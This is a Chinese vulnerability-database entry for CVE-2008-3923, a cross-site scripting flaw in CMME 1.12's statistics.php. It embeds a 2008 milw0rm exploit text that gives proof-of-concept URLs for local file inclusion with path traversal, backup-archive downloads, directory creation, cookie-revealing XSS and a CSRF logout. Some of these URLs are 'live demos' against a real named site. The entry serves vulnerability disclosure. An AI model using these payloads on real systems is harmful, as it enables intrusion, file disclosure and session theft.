CMME 'statistics.php'跨站攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115971 漏洞类型 跨站脚本
发布时间 2008-08-26 更新时间 2009-01-29
CVE编号 CVE-2008-3923 CNNVD-ID CNNVD-200809-071
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/6313
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200809-071
|漏洞详情
ContentManagementMadeEasy是一款开源的基于php的内容管理系统。ContentManagementMadeEasy(CMME)1.12版本中的statistics.php存在多个跨站脚本攻击漏洞。远程攻击者可以借助hstat_year操作中的页参数和年参数,注入任意的web脚本或HTML。
|漏洞EXP
##################################################################################################################
[+] CMME 1.12 (LFI/XSS/CSRF/Download Backup/MkDir) Multiple Remote Vulnerabilities 
[+] Discovered By SirGod                        
[+] www.mortal-team.org                        
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,MesSiAH,xZu,HrN,kemrayz
##################################################################################################################

[+] Local File Inclusion

    Note : magic_quotes_gpc must be off.
 
    Example :

     http://localhost/index.php?page=weblog&env=[Local File]%00

    PoC :

     http://localhost/index.php?page=weblog&env=../../../autoexec.bat%00
    

[+] Download Backup

     Example 1:

       http://localhost/backup/[Backup Name].zip

     PoC 1:

       http://localhost/backup/cmme_data.zip

     Live Demo 1:

       http://cmme.oesterholt.net/backup/cmme_data.zip

     Example 2:

       http://localhost/backup/[Backup Name].zip

     PoC 2:

       http://localhost/backup/cmme_cmme.zip

     Live Demo 2:

       http://cmme.oesterholt.net/backup/cmme_cmme.zip

      
[+] Make Directory

    You can make multiple directories in website root folder.

      Example 1:
     
        http://localhost/admin.php?action=login&page=home&script=index.php&env=[Directory]

      PoC 1:

        http://localhost/admin.php?action=login&page=home&script=index.php&env=!!!Owned!!!


    Or you can make dir in previous directory,etc.

      Example 2:

        http://localhost/admin.php?action=login&page=home&script=index.php&env=../[Directory]

      PoC 2:

        http://localhost/admin.php?action=login&page=home&script=index.php&env=../!!!Owned!!!


[+] Cross Site Scripting  

     Example 1:
     
      http://localhost/statistics.php?action=hstat_year&page=[XSS}&env=data

     PoC 1:

      http://localhost/statistics.php?action=hstat_year&page=<script>alert(document.cookie)</script>&env=data

     Live Demo 1:

      http://cmme.oesterholt.net/statistics.php?action=hstat_year&page=<script>alert(document.cookie)</script>&env=data

     Example 2:

      http://localhost/statistics.php?action=hstat_year&year=[XSS]&env=data

     PoC 2:

      http://localhost/statistics.php?action=hstat_year&year=<script>alert(document.cookie)</script>&env=data

     Live Demo 2:
     
      http://cmme.oesterholt.net/statistics.php?action=hstat_year&year=<script>alert(document.cookie)</script>&env=data


[+] Cross Site Request Forgery

    If an logged in user with administrator privileges clicks the following link he will be logged out.

      http://localhost/admin.php?action=logout&page=home&env=data


##################################################################################################################

# milw0rm.com [2008-08-26]
|参考资料

来源:XF
名称:cmme-statistics-xss(44685)
链接:http://xforce.iss.net/xforce/xfdb/44685
来源:BID
名称:30854
链接:http://www.securityfocus.com/bid/30854
来源:MILW0RM
名称:6313
链接:http://www.milw0rm.com/exploits/6313
来源:SREASON
名称:4220
链接:http://securityreason.com/securityalert/4220
来源:SECUNIA
名称:31599
链接:http://secunia.com/advisories/31599